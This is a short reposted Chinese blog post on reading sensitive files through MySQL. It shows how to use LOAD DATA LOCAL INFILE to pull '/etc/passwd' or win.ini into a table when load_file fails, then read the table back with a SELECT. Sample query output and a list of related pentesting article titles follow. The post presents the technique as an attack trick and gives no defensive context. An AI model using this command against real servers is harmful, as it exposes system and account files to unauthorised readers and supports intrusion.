针对mysql的后台语句执行读取敏感信息

Posted 求知鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了针对mysql的后台语句执行读取敏感信息相关的知识,希望对你有一定的参考价值。

load file 读取无效时

连接mysql写入:

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY \'\\n\';   //test 表名  或者 "C:/Windows/win.ini"
Query OK, 11 rows affected, 11 warnings (0.01 sec)
Records: 11  Deleted: 0  Skipped: 0  Warnings: 1

前台执行:select * from `test`

 

以上是关于针对mysql的后台语句执行读取敏感信息的主要内容,如果未能解决你的问题,请参考以下文章

Pikachu:目录遍历敏感信息泄漏及URL重定向

mysql设置大小写敏感

ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)

通达OA 后台多个SQL注入漏洞

Pikachu-目录遍历敏感信息泄露URL重定向

mysql安全小结